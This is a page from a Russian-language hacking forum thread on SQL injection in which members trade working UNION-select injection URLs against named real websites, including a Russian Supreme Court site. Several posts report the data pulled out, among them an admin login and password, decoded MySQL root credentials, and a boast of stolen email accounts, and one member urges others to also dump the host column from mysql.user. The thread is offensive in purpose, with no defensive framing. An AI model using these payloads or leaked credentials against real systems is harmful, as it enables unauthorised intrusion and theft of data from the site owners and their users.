SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    это sybase ODBC.
    Почитай я создавал темы.
    А вообще хочешь расковырять тебе на sql.ru
    синтаксис как mssql.
     
  2. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    Code:
    http://director-online.com/buildArticle.php?id=311+order+by+8
    +
    +

    Code:
    http://www.thesop.org/index.php?id=21+order+by+1
    +
    +
    .pl
    Code:
    http://www.mikado.pl/kolowrotek.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*/*
     
    #1962 BlackCats, 17 Apr 2007
    Last edited: 17 Apr 2007
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.cybersquads.ru
    Code:
    http://cybersquads.ru/demos/?type=&gametype=&map=&pov=can'+union+select+1,2,3,4,5,version(),7,concat_ws(char(58),login,password),9,10,11+from+users/*
    
    login : pass
    Admin login: unlim
    Password: qqq1
     
  4. toPoR

    toPoR New Member

    Joined:
    17 Apr 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.celtavigo.net/sections.php?op=viewarticle&artid=-320+union+select+1,2,3,4,5/*
    Code:
    http://www.celtavigo.net/sections.php?op=listarticles&secid=-4+union+select+1,2,3,4,5/*
    Code:
    http://www.celtavigo.net/article.php?sid=-9296++union+select+1,2,3,4,5,6,7,8/*
    ничего кроме цифр не получилось :mad:
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    2 toPoR
     
    1 person likes this.
  6. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    Code:
    http://www.foodforfun.ru/self.php?id=-1+union+select+1,2/*
    
     
  7. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    Code:
    http://www.thesop.org/index.php?id=-1+union+select+1/*
     
  8. ZanozA

    ZanozA New Member

    Joined:
    5 Oct 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    плиз,посматрите инЪеции на http://fogofwar.ru
     
  9. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Code:
    http://www.otadoya.ru/catalog/more/?cat_id=-8+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/*&id=1543
    таблиц не нашел :( ,рядом форум стоит
    Code:
    http://ibc-web.ru/portfolio/?id=13'
    ну собственно сам разроботчик сайта тока вывода нет ;)
     
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ва
     
  11. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    а вот и поинтересней
    Code:
    http://www.ecotour.ru/viewcountry.php?id=-9+union+select+1,null,concat(user_name,char(58),user_password),4,5+FROM+photo_users/*
    вроде админка есть
    Code:
    http://www.ecotour.by/robots.txt
    но хз как в нее попасть также акк подходит к
    Code:
    http://37.ecotour.by
    юзайте ;)
    в итоге угнал 3 мыла хоть и не красивые но зато приятно:)
     
    #1971 }{0TT@БЬ)Ч, 17 Apr 2007
    Last edited: 18 Apr 2007
  12. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    
    Code:
    http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+news/*
    
    нашел только таблицу news . . .
     
    1 person likes this.
  13. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    9898
     
  14. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://scriptmagix.com/index.php?cmd=2&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7+from+admin+limit+1,1/*
    ^^
     
  15. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ss
     
  16. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.dvdcdtorg.ru
    Code:
    http://www.dvdcdtorg.ru/?pageId=1&catId=-13+union+select+1,2,concat_ws(char(58,58),version(),database(),user()),4,5,6,7,8/*
    www.mfun.ru
    Code:
    http://www.mfun.ru/music/melody/play.php?melodyid=-1+union+select+1,concat_ws(char(58,58),version(),database(),user()),3,4/*
    www.notaryclub.ru
    Есть таблица : ccforum_users
    Колонки не нашел =)
    Версия mysql: 5
    Code:
    http://notaryclub.ru/users.php?op=show&uid=-5+union+select+1,2,3,4,concat_ws(char(58,58),version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

    Верховный суд Российской Федерации

    Имеются таблицы:
    1)users:
    Колонки: нашел только password
    2)user:
    user : password
    Code:
    http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,password)+using+cp1251)+from+mysql.user/*
    MySQL info
    Code:
    http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58,58),version(),database(),user())+using+cp1251)+from+users/*
     
    #1976 banned, 18 Apr 2007
    Last edited: 18 Apr 2007
  17. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    To Isis
    Code:
    http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,pa  ssword)+using+cp1251)+from+mysql.user/*
    
    расшифровывается так:

    root:root
    axmet:ax
     
  18. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    http://www.marumi-filter.ru/shop/?id=74'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1, 2/*

    http://www.sexshop-romantic.ro/sex-shop/?id=-26+union+select+1,2,3/* - 3 версия(

    http://www.bomdiggy.com/readColumn.php?id=-43+union+select+1,2,version(),4,5,6,7,8+from+users/*
     
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    К тем кто выкладывает скули с доступом к базе mysql, выводите не только колонки user и password, а ещё и host
     
    1 person likes this.
  20. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12%20+from+mysql.user/*

    http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

    http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
     
    #1980 _GaLs_, 18 Apr 2007
    Last edited: 18 Apr 2007
Thread Status:
Not open for further replies.